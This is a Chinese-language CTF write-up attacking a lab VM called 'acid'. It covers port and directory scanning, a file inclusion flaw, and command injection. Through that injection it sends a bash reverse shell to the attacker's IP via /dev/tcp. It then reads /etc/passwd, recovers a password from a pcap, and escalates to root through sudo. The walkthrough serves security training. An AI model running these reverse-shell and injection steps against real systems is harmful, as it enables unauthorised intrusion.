0x01 环境搭建
1、靶机下载地址
2、攻击机kali地址192.168.199.134
0x02 靶机发现
将攻击机和靶机的网络模式都设置为nat模式,用nmap -sn发现主机,关闭靶机,再扫一遍,其中少的主机为靶机ip。
0x03 信息收集
1、端口扫描,发现33447端口
┌──(root💀kali)-[~]
└─# nmap -p- 192.168.199.128
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 20:42 EST
Nmap scan report for 192.168.199.128
Host is up (0.00044s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
33447/tcp open unknown
MAC Address: 00:0C:29:BB:65:29 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
web访问33447端口
2、网页扫描
(1)使用big.txt字典扫描,发现images目录和其下数据库文件Thumbs.db,无果。
┌──(root💀kali)-[~]
└─# dirb http://192.168.199.128:33447 /usr/share/wordlists/dirb/big.txt 255 ?
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 3 20:48:26 2022
URL_BASE: http://192.168.199.128:33447/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.199.128:33447/ ----
==> DIRECTORY: http://192.168.199.128:33447/css/
==> DIRECTORY: http://192.168.199.128:33447/images/
+ http://192.168.199.128:33447/server-status (CODE:403|SIZE:306)
---- Entering directory: http://192.168.199.128:33447/css/ ----
---- Entering directory: http://192.168.199.128:33447/images/ ----
+ http://192.168.199.128:33447/images/Thumbs.db (CODE:200|SIZE:31744)
-----------------
END_TIME: Thu Mar 3 20:49:00 2022
DOWNLOADED: 61374 - FOUND: 2
(2)继续查看网页源码,发现提示字符串,0x643239334c6d70775a773d3d
使用decoder两次解密得到wow.jpg
常规思路,我们会怀疑图片中存在隐写信息,使用cat命令发现图片末尾有16进制数字
将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码,得到
7aee0f6d588ed9905ee37f16a7c610d4,这是一串md5。 去cmd5解密,得到63425,推测是一个密码或者ID。至此发现wow.jpg可能是出题者留下的一个坑,此处需要果断放弃,看其他条件。
(3)再返回看主页,发现title标签处有提示,发现新目录,这也是CTF常见提示套路。
(4)扫描/Challenge目录,发现子目录及PHP页面
┌──(root??kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 3 22:03:29 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
==> DIRECTORY: http://192.168.199.128:33447/Challenge/css/
==> DIRECTORY: http://192.168.199.128:33447/Challenge/includes/
==> DIRECTORY: http://192.168.199.128:33447/Challenge/js/
==> DIRECTORY: http://192.168.199.128:33447/Challenge/styles/
---- Entering directory: http://192.168.199.128:33447/Challenge/css/ ----
---- Entering directory: http://192.168.199.128:33447/Challenge/includes/ ----
---- Entering directory: http://192.168.199.128:33447/Challenge/js/ ----
---- Entering directory: http://192.168.199.128:33447/Challenge/styles/ ----
-----------------
END_TIME: Thu Mar 3 22:04:23 2022
DOWNLOADED: 102290 - FOUND: 0
提交任意参数,观察页面为php页面
(5)使用-X参数扫描,发现cake.php、error.php、include.php、index.php页面
┌──(root??kali)-[~]
└─# dirb http://192.168.199.128:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 3 22:09:32 2022
URL_BASE: http://192.168.199.128:33447/Challenge/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.199.128:33447/Challenge/ ----
+ http://192.168.199.128:33447/Challenge/cake.php (CODE:200|SIZE:496)
+ http://192.168.199.128:33447/Challenge/error.php (CODE:200|SIZE:309)
+ http://192.168.199.128:33447/Challenge/include.php (CODE:302|SIZE:0)
+ http://192.168.199.128:33447/Challenge/index.php (CODE:200|SIZE:1333)
(6)访问include.php页面,发生302跳转
进入login页面,随便输入用户名密码,获得cookie,再访问include.php页面
上burpsuite发现文件包含漏洞,实现可读文件/etc/passwd
(7)由于没有上传点,再次访问cake.php,发现下级目录/Magic_Box
(8)继续-X参数扫描,发现low.php和command.php,command.php中有命令执行漏洞
0x03 漏洞利用
使用通过URL编码的命令进行bash反弹
bash -c 'bash -i >& /dev/tcp/192.168.199.134/6666 0>&1'
得到反弹shell
0x04 权限提升
1、python导入交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
2、进入/tmp目录,发现wget、gcc命令不存在,猜测题意非溢出提权,需要查找密码
┌──(root💀kali)-[~]
└─# nc -lvp 6666 1 ?
listening on [any] 6666 ...
192.168.199.128: inverse host lookup failed: Unknown host
connect to [192.168.199.134] from (UNKNOWN) [192.168.199.128] 33055
bash: cannot set terminal process group (1430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /tmp
cd /tmp
www-data@acid:/tmp$ wget
wget
The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget'
www-data@acid:/tmp$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@acid:/tmp$
3、查看用户有两个acid和saman
www-data@acid:/tmp$ ls /home
ls /home
acid
saman
www-data@acid:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
www-data@acid:/tmp$
4、查看用户文件
这类提权题目一般是通过文件中查找普通用户密码,进而通过sudo或者suid提权,因此查找用户文件这条命令必不可少需要记忆并熟练使用
find / -user acid 2>/dev/null
进入到home目录,发现有两个普通用户,acid和saman,查看acid所属文件,发现流量包hint.pcapng
www-data@acid:/var/www/html/Challenge/Magic_Box$ cd /home
cd /home
www-data@acid:/home$ ls
ls
acid
saman
www-data@acid:/home$ find / -user acid 2>/dev/null
find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
/bin/pwn_me
/bin/pwn_me/chkrootkit.lsm
/bin/pwn_me/chkrootkit
/bin/pwn_me/README.chkwtmp
/bin/pwn_me/ACKNOWLEDGMENTS
/bin/pwn_me/chkdirs.c
/bin/pwn_me/ifpromisc.c
/bin/pwn_me/Makefile
/bin/pwn_me/chklastlog.c
/bin/pwn_me/strings.c
/bin/pwn_me/chkwtmp.c
/bin/pwn_me/README.chklastlog
/bin/pwn_me/COPYRIGHT
/bin/pwn_me/chkproc.c
/bin/pwn_me/README
/bin/pwn_me/chkutmp.c
/bin/pwn_me/check_wtmpx.c
/var/lib/lightdm-data/acid
/var/www/html/Challenge/less
/var/www/html/Challenge/less/style.less
/var/www/html/Challenge/css
/var/www/html/Challenge/css/style.css
/var/www/html/Challenge/css/style.css.save
/var/www/html/index.html
/var/www/html/images
/var/www/html/images/bg.jpg
/var/www/html/images/Thumbs.db
/var/www/html/images/wow.jpg
/var/www/html/css
/var/www/html/css/style.css
/home/acid
/home/acid/.xsession-errors.old
/home/acid/Public
/home/acid/.thumbnails
/home/acid/Desktop
/home/acid/.mozilla
/home/acid/.gconf
/home/acid/Videos
/home/acid/Templates
/home/acid/.config
/home/acid/Music
/home/acid/.profile
/home/acid/.bashrc
/home/acid/.sudo_as_admin_successful
/home/acid/Downloads
/home/acid/.xsession-errors
/home/acid/.dmrc
/home/acid/.Xauthority
/home/acid/.local
/home/acid/.local/share
/home/acid/.xscreensaver
/home/acid/.bash_history
/home/acid/.bash_logout
/home/acid/.cache
/home/acid/.cache/ibus
/home/acid/.cache/ibus/bus
/home/acid/.cache/ibus/bus/registry
/home/acid/.cache/update-manager-core
/home/acid/.cache/update-manager-core/meta-release
/home/acid/.cache/event-sound-cache.tdb.d08d798c4c9c42baa2b60403184f4c66.i686-pc-linux-gnu
/home/acid/.cache/lxpanel-indicator-plugin.log
/home/acid/.cache/fontconfig
/home/acid/.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le32d4.cache-4
/home/acid/.cache/fontconfig/CACHEDIR.TAG
/home/acid/.cache/motd.legal-displayed
/home/acid/.cache/vmware
/home/acid/.cache/openbox
/home/acid/.cache/openbox/openbox.log
/home/acid/.cache/openbox/sessions
/home/acid/.cache/lxsession
/home/acid/.cache/lxsession/Lubuntu
/home/acid/.cache/lxsession/Lubuntu/run.log
/home/acid/.cache/usb-creator.log
/home/acid/.cache/gstreamer-1.0
/home/acid/.cache/gstreamer-1.0/registry.i686.bin
/home/acid/.cache/menus
/home/acid/.cache/mozilla
/home/acid/.dbus
/home/acid/Documents
/home/acid/.selected_editor
/home/acid/Pictures
5、流量包文件分析发现saman密码
将流量包cp到web目录,下载到kali,并且打开,过滤data,发现saman的密码1337hax0r
6、利用sudo配置不当提权
python导入pty生成交互式shell,使用su命令切换到saman,发现密码正确。发现sudo配置不当,权限过大,直接提权到root
www-data@acid:/home$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@acid:/home$ ls
ls
acid saman
www-data@acid:/home$ su - saman
su - saman
Password: 1337hax0r
saman@acid:~$ whoami
whoami
saman
saman@acid:~$ sudo -l
sudo -l
[sudo] password for saman: 1337hax0r
Matching Defaults entries for saman on acid:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User saman may run the following commands on acid:
(ALL : ALL) ALL
saman@acid:~$ sudo su -
sudo su -
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
root@acid:~#